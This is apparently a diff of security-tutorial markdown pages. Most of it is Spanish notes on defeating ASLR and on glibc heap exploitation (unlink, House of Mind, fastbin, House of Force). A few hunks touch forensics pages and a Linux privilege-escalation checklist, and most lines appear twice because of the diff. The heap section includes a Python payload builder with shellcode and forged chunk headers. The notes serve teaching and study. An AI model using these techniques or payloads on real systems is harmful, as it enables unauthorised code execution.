Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales
Memoria asignada por mmap() y libraries compartidas —> 16bits, delta_mmap Memoria asignada por mmap() y libraries compartidas —> 16bits, delta\_mmap
El stack —> 24bits, delta_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack El stack —> 24bits, delta\_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack
Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack. Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack.
@ -542,7 +542,7 @@ Es una técnica para convertir un buffer overflow en un error de cadena de forma
**Ataque a librerías** **Ataque a librerías**
Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta_mmap y calcular las demás. Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás.
La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta. La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta.
@ -679,9 +679,9 @@ Bind now —> Las direcciones de las funciones se buscan al cargar el programa y
A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles.
**readelf -l /proc/ID_PROC/exe | grep BIND_NOW** —> Para saber si usan el BIND NOW **readelf -l /proc/ID\_PROC/exe | grep BIND\_NOW** —> Para saber si usan el BIND NOW
#### **Fortify Source -D_FORTIFY_SOURCE=1 o =2** #### **Fortify Source -D\_FORTIFY\_SOURCE=1 o =2**
Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura. Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura.
@ -689,7 +689,7 @@ Por ej:\
char buf\[16];\ char buf\[16];\
strcpy(but, source); strcpy(but, source);
La identifica como insegura y entonces cambia strcpy() por \__strcpy_chk() utilizando el tamaño del buffer como tamaño máximo a copiar. La identifica como insegura y entonces cambia strcpy() por \_\_strcpy\_chk() utilizando el tamaño del buffer como tamaño máximo a copiar.
La diferencia entre **=1** o **=2** es que: La diferencia entre **=1** o **=2** es que:
@ -699,11 +699,11 @@ Para mostrar el mensaje de error se usa el argv\[0], por lo que si se pone en el
#### **Reemplazo de Libsafe** #### **Reemplazo de Libsafe**
Se activa con: LD_PRELOAD=/lib/libsafe.so.2\ Se activa con: LD\_PRELOAD=/lib/libsafe.so.2\
o\ o\
“/lib/libsave.so.2” > /etc/ld.so.preload “/lib/libsave.so.2” > /etc/ld.so.preload
Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD_PRELOAD no sirve en binarios con suid). Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid).
#### **ASCII Armored Address Space** #### **ASCII Armored Address Space**
@ -734,13 +734,13 @@ Insure++
**Trozo asignado** **Trozo asignado**
prev_size |\ prev\_size |\
size | —Cabecera\ size | —Cabecera\
\*mem | Datos \*mem | Datos
**Trozo libre** **Trozo libre**
prev_size |\ prev\_size |\
size |\ size |\
\*fd | Ptr forward chunk\ \*fd | Ptr forward chunk\
\*bk | Ptr back chunk —Cabecera\ \*bk | Ptr back chunk —Cabecera\
@ -762,20 +762,20 @@ BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk\
Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra: Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra:
BK = P->bk = \&shellcode\ BK = P->bk = \&shellcode\
FD = P->fd = &\__dtor_end\_\_ - 12\ FD = P->fd = &\_\_dtor\_end\_\_ - 12\
FD->bk = BK -> \*((&\__dtor_end\_\_ - 12) + 12) = \&shellcode FD->bk = BK -> \*((&\_\_dtor\_end\_\_ - 12) + 12) = \&shellcode
Y así se se ejecuta al salir del programa la shellcode. Y así se se ejecuta al salir del programa la shellcode.
Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto: Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto:
BK->fd = FD -> \*(\&shellcode + 8) = (&\__dtor_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode. BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor\_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode.
Por lo tanto el exploit se crea: Por lo tanto el exploit se crea:
En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode. En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode.
Después de la shell code metemos relleno hasta llegar al campo prev_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**. Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**.
Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso). Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso).
@ -791,17 +791,17 @@ Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo q
**"\x80\xe8\xdc\xff\xff\xff/bin/sh";** **"\x80\xe8\xdc\xff\xff\xff/bin/sh";**
**prev_size = pack("\<I”, 0xfffffff0) #Interesa que el bit que indica que el anterior trozo está libre esté a 1** **prev\_size = pack("\<I”, 0xfffffff0) #Interesa que el bit que indica que el anterior trozo está libre esté a 1**
**fake_size = pack("\<I”, 0xfffffffc) #-4, para que piense que el “size” del 3º trozo está 4bytes detrás (apunta a prev_size) pues es ahí donde mira si el 2º trozo está libre** **fake\_size = pack("\<I”, 0xfffffffc) #-4, para que piense que el “size” del 3º trozo está 4bytes detrás (apunta a prev\_size) pues es ahí donde mira si el 2º trozo está libre**
**addr_sc = pack("\<I", 0x0804a008 + 8) #En el payload al principio le vamos a poner 8bytes de relleno** **addr\_sc = pack("\<I", 0x0804a008 + 8) #En el payload al principio le vamos a poner 8bytes de relleno**
**got_free = pack("\<I", 0x08048300 - 12) #Dirección de free() en la plt-12 (será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free)** **got\_free = pack("\<I", 0x08048300 - 12) #Dirección de free() en la plt-12 (será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free)**
**payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) # Como se dijo el payload comienza con 8 bytes de relleno porque sí** **payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) # Como se dijo el payload comienza con 8 bytes de relleno porque sí**
**payload += prev_size + fake_size + got_free + addr_sc #Se modifica el 2º trozo, el got_free apunta a donde vamos a guardar la direccion addr_sc + 12** **payload += prev\_size + fake\_size + got\_free + addr\_sc #Se modifica el 2º trozo, el got\_free apunta a donde vamos a guardar la direccion addr\_sc + 12**
**os.system("./8.3.o " + payload)** **os.system("./8.3.o " + payload)**
@ -813,11 +813,11 @@ En ese caso:
En el chunck c se pone el shellcode En el chunck c se pone el shellcode
El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV_INUSE desactivado de forma que piense que el chunck a está libre. El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV\_INUSE desactivado de forma que piense que el chunck a está libre.
Además, se sobreescribe en la cabecera b el size para que valga -4. Además, se sobreescribe en la cabecera b el size para que valga -4.
Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink() para desenlazarlo. Sin embargo, como la cabecera PREV_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink() a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”. Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink() para desenlazarlo. Sin embargo, como la cabecera PREV\_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink() a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”.
De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts()”-12 tenemos nuestro payload. De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts()”-12 tenemos nuestro payload.
@ -835,7 +835,7 @@ Un buffer contiguo a este que debe ser liberado y al que se le modificará el ca
Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior
Un buffer declarado antes del paso 3 que permita sobreescribir el prev_size de este Un buffer declarado antes del paso 3 que permita sobreescribir el prev\_size de este
De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit. De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit.
@ -857,9 +857,9 @@ Las técnicas de Unlink() y FrontLink() fueron eliminadas al modificar la funci
Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado. Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado.
Una llamada a free() provoca llamar a public_fREe(mem), este hace: Una llamada a free() provoca llamar a public\_fREe(mem), este hace:
mstate ar_ptr; mstate ar\_ptr;
mchunkptr p; mchunkptr p;
@ -869,22 +869,22 @@ p = mem2chunk(mes); —> Devuelve un puntero a la dirección donde comienza el t
ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:\&main_arena \[1] ar\_ptr = arena\_for\_chunk(p); —> chunk\_non\_main\_arena(ptr)?heap\_for\_ptr(ptr)->ar\_ptr:\&main\_arena \[1]
\_int_free(ar_ptr, mem); \_int\_free(ar\_ptr, mem);
} }
En \[1] comprueba el campo size el bit NON_MAIN_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap_for_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar_ptr (como si fuese un struct heap_info) En \[1] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar\_ptr (como si fuese un struct heap\_info)
De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap_for_ptr(ptr)->ar_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar_ptr) De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr(ptr)->ar\_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr)
De esta forma se llama a \_int_free(ar_ptr, mem), es decir, **\_int_free(0x0804a000, 0x081002a0)**\ De esta forma se llama a \_int\_free(ar\_ptr, mem), es decir, **\_int\_free(0x0804a000, 0x081002a0)**\
**\_int_free(mstate av, Void_t\* mem){**\ **\_int\_free(mstate av, Void\_t\* mem){**\
…\ …\
bck = unsorted_chunks(av);\ bck = unsorted\_chunks(av);\
fwd = bck->fd;\ fwd = bck->fd;\
p->bk = bck;\ p->bk = bck;\
p->fd = fwd;\ p->fd = fwd;\
@ -895,22 +895,22 @@ fwd->bk = p;
Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar. Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar.
Tal y como se define unsorted_chunks, sabemos que:\ Tal y como se define unsorted\_chunks, sabemos que:\
bck = \&av->bins\[2]-8;\ bck = \&av->bins\[2]-8;\
fwd = bck->fd = \*(av->bins\[2]);\ fwd = bck->fd = \*(av->bins\[2]);\
fwd->bk = \*(av->bins\[2] + 12) = p; fwd->bk = \*(av->bins\[2] + 12) = p;
Por lo tanto si en av->bins\[2] escribimos el valor de \__DTOR_END\_\_-12 en la última instrucción se escribirá en \__DTOR_END\_\_ la dirección del segundo trozo. Por lo tanto si en av->bins\[2] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo.
Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \__DTOR_END\_\_-12 porque de ahí la sacará av->bins\[2] Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av->bins\[2]
En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap_for_ptr() piense que el ar_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2] En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr() piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2]
En el segundo trozo y gracias al primero sobreescribimos el prev_size con un jump 0x0c y el size con algo para activar -> NON_MAIN_ARENA En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -> NON\_MAIN\_ARENA
A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode
De esta forma se llamará a \_int_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \__DTOR_END\_\_ la dirección del prev_size del TROZO2 el cual saltará a la shellcode. De esta forma se llamará a \_int\_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode.
Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload. Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload.
@ -920,9 +920,9 @@ Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para u
Es una variante de The house of mind Es una variante de The house of mind
nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int_free() nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free()
fb = &(av->fastbins\[fastbin_index(size)] —> Siendo fastbin_index(sz) —> (sz >> 3) - 2 fb = &(av->fastbins\[fastbin\_index(size)] —> Siendo fastbin\_index(sz) —> (sz >> 3) - 2
@ -930,33 +930,33 @@ p->fd = \*fb
\*fb = p \*fb = p
De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max_fast esté en la dirección que vamos a sobreescribir. De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max\_fast esté en la dirección que vamos a sobreescribir.
Dado que con The House of Mind se vio que nosotros controlábamos la posición del av. Dado que con The House of Mind se vio que nosotros controlábamos la posición del av.
Entones si en el campo size ponemos un tamaño de 8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index() nos devolverá fastbins\[-1], que apuntará a av->max_fast Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index() nos devolverá fastbins\[-1], que apuntará a av->max\_fast
En este caso av->max_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita). En este caso av->max\_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita).
Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops). Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops).
Además, ese mismo trozo falso debe ser menor que av->system_mem. av->system_mem se encuentra 1848 bytes más allá. Además, ese mismo trozo falso debe ser menor que av->system\_mem. av->system\_mem se encuentra 1848 bytes más allá.
Por culpa de los nulos de \_DTOR_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila. Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila.
Otra forma de ataque es redirigir el **av** hacia la pila. Otra forma de ataque es redirigir el **av** hacia la pila.
Si modificamos el size para que de 16 en vez de 8 entonces: fastbin_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila. Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila.
Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET
Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0.
El **av->max_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones.
En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode. En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode.
Además, en **av->system_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza. Además, en **av->system\_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza.
Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso). Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso).
@ -964,9 +964,9 @@ Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor qu
En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable). En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable).
Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48. Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48.
Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system_mem. Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system\_mem.
En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera. En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera.
@ -980,7 +980,7 @@ Es necesario:
* Una llamada a malloc() con el tamaño definido por el usuario * Una llamada a malloc() con el tamaño definido por el usuario
* Una llamada a malloc() cuyos datos puedan ser definidos por el usuario * Una llamada a malloc() cuyos datos puedan ser definidos por el usuario
Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int_malloc() sin necesidad de expandir el heap Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc() sin necesidad de expandir el heap
Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8. Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8.
@ -988,7 +988,7 @@ Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el co
victim = av->top; victim = av->top;
remainder = chunck_at_offset(victim, nb); remainder = chunck\_at\_offset(victim, nb);
av->top = remainder; av->top = remainder;
@ -1006,7 +1006,7 @@ Es importante saber que el size del nuevo trozo wilderness sea más grande que l
Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado.
Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max_fast (72normalmente) y menos a MIN_LARGE_SIZE (512). Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast (72normalmente) y menos a MIN\_LARGE\_SIZE (512).
Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo:
@ -1072,4 +1072,4 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
## **References** ## **References**
* \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html)\*\*\*\* * \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)\*\*\*\*

View file

@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command) In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (3).png>) ![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (2) (2).png>)
An then use the following code An then use the following code
@ -212,7 +212,7 @@ Also, the OS usually saves a lot of information about file system changes and ba
Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
There are several tools that you can use for file Carving indicating them the file-types you want search for&#x20; There are several tools that you can use for file Carving indicating them the file-types you want search for
{% content-ref url="file-data-carving-recovery-tools.md" %} {% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)

View file

@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (3).png>) ![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (2).png>)
### USB Detective ### USB Detective

View file

@ -31,7 +31,7 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] **Any unmounted drive?** * [ ] **Any unmounted drive?**
* [ ] **Any creds in fstab?** * [ ] **Any creds in fstab?**
### ****[**Installed Software**](privilege-escalation/#installed-software)**** ### [**Installed Software**](privilege-escalation/#installed-software)
* [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed** * [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed**
* [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed** * [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed**
@ -98,7 +98,7 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)? * [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)?
* [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? * [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
* [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass * [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass
